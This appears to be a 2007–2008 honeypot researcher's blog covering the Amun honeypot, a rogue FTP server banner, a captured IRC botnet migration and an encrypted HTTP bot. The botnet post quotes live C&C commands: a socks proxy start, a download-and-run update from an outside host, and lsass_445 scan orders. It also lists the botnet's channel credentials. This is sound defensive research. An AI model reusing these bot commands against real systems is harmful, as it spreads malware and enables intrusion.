info@davidnavas.com xxx.xxx.xxx.xxx
info@davidnealmuir.com xxx.xxx.xxx.xxx

[...]

So these are e-mail addresses followed by a comma separated list of mailservers which accept outgoing mail for the domains.


Rogue FTP

— Posted by zeroq @ 13:09 - 08 Jan, 2008

I came across a nice rogue FTP server while examining a host trying to exploit the simulated Trend Micro vulnerability from May 2007 on my Amun honeypot:

220-##################################################
220-##################################################
220-##| o0o-======= a slb33 production =======-o0o |##
220-##|____________________________________________|##
220-##################################################
220-##################################################
220-##| o0o-============= Rules ==============-o0o |##
220-##| |##
220-##| Don't Hammer! |##
220-##| Don't Rehack! |##
220-##| Don't Repost or Share the Info! |##
220-##| Don't Rescan This Range! |##
220-##| Enjoy the Stro! |##
220-##|____________________________________________|##
220-##################################################
220-##################################################
220-
220-::::::::::::::::::::::::::::::::::::::::::::::::::
220-::::::::::::::::::::::::::::::::::::::::::::::::::
220-
220-##################################################
220-##################################################
220-##| o0o-========== Server Stats ==========-o0o |##
220-##| |##
220-##|The Local time is 04:06:20 |##
220-##|Average Throughput 0.000 Kb/sec |##
220-##|In Use 0.000 Kb/sec |##
220-##|Users Connected 1 |##
220-##|Uploaded 0 KBps |##
220-##|Leeched 0 KBps |##
220-##|Disk Space 35464.12 |##
220-##|Uptime 45 Days 14 Hours. |##
220-##|____________________________________________|##
220-##################################################
220-##################################################

Unfortunately, his exploit did not send any shellcode... by the way, the FTP server is listening on port 723.



Botnet on the move

— Posted by zeroq @ 17:25 - 20 Dec, 2007

Today I was able to monitor a botnet switching servers, a pretty interesting thing. Monitoring was accomplished with the new infiltrator software, which is not released yet =)

Enjoy the last commands on the old server and channel:

:MasterMir@221.x JOIN :#r0d#
:MasterMir@221.x PRIVMSG #r0d# :.l m4st3r.p3rd3s1
:P-526356@153.x PRIVMSG #r0d# :-4main- Password accepted.
:MasterMir@221.x PRIVMSG #r0d# :.socks4
:P-526356@153.x PRIVMSG #r0d# :-4socks4- Server started on: 81.x.x.x:2020.
:MasterMir@221.x PRIVMSG #r0d# :.upkcr http://x.x.x.x/farooqss/bilals.exe 1
:P-526356@153.x PRIVMSG #r0d# :-4update- Downloading update from: http://x.x.x.x/farooqss/bilals.exe.
:P-526356@153.x PRIVMSG #r0d# :-4download- downloaded 161.0KB to C:DOCUME~1AdinaLOCALS~1Tempurvzuvd.exe @ 32.2KB/sec, updating bot
:MasterMir@221.x PRIVMSG #r0d# :.rmzcv
:P-526356@153.x PRIVMSG #r0d# :-4main- Removing Bot.
:P-526356@153.x QUIT :EOF From client

If you download the last binary and run it in a sandbox you get the new server IP and IRC information:
  • C&C Server: 217.x.x.x:6667
  • Server Password:
  • Username: rfmv
  • Nickname: DHEDHI-8788
  • Channel: #a#s#b (Password: picture)
  • Channeltopic: :zasc lsass_445 100 5 0 189.0.x.x -r -b
So let's take a look at the channel:
:DHEDHI-8788@x.x.x.x JOIN :#a#s#b
:DHEDHI-8788 #a#s#b :zasc lsass_445 100 5 0 189.0.x.x -r -b
:DHEDHI-8788 #a#s#b MasterMir 1198165457
:DHEDHI-8788 @ #a#s#b :DHEDHI-8788 SS-71041 DHEDHI-8992 DHEDHI-0502 DHEDHI-9557 DHEDHI-2349 @MasterMir DHEDHI-1473 DHEDHI-5034
: DHEDHI-8788 #a#s#b :End of /NAMES list.
:DHEDHI-4301@x.x.x.x JOIN :#a#s#b
:DHEDHI-4301@x.x.x.x PRIVMSG #a#s#b :scan Random Port Scan started on 189.0.x.x:445 with a delay of 5 seconds for 0 minutes using 100 threads.


Encrypted HTTP Bot

— Posted by zeroq @ 10:29 - 20 Dec, 2007

I stumbled over an HTTP based bot which uses encryption for commands and URL parameters. I have not seen this before, so I decided to let you all know about it.

Another interesting thing is, the binary does not run in the Anubis sandbox, but it does in CWSandbox.

Infected machines issue an HTTP request similar to this: http://64.34.xxx.xxx/tba/p?guid=xxx&version=xxx[...]

The following parameters are used:

  • guid
  • version
  • clientid
  • time
  • locale
  • idle
  • activeWindows
  • crc

The values look like this:

  • E723E7BF51[...]DA96
  • F01[...]B1
  • AB0E[...]0F7



Amun first release v0.1.0

— Posted by zeroq @ 11:39 - 11 Dec, 2007

I decided to release a first version of Amun to the public. Amun is released under the GNU Public Licence. The software is available here: http://zero.ram.rwth-aachen.de/amun/

Amun is a low-interaction honeypot designed to capture autonomous spreading malware, like for example Nepenthes. The main difference is that it is written in Python and most parameters can be changed while running, thus it might be easier to add new features.



Amun: replace locals

— Posted by zeroq @ 15:00 - 09 Dec, 2007

The replace local IP function is now fully implemented in Amun. I had some minor issues which needed to be fixed, but it's working now. Currently we are running two Amun sensors with about 7000 IP addresses each. One of the sensors is running with replace local IPs turned on, the other one turned off.

Now the interesting thing is, currently the sensor which does not replace local IPs, and therefore has fewer downloads, nevertheless has many more unique downloads. It seems that replacing local IPs to get more downloads does not actually mean you get all the new ones.

Some numbers:
Amun (replace locals on): average (overall) downloads per day: 70
Amun (replace locals off): average (overall) downloads per day: 10
Both sensors have been running at these settings for 5 days now and sensor number two (with replace locals turned off) currently has 16 more unique samples, that's about 3 unique samples more per day.


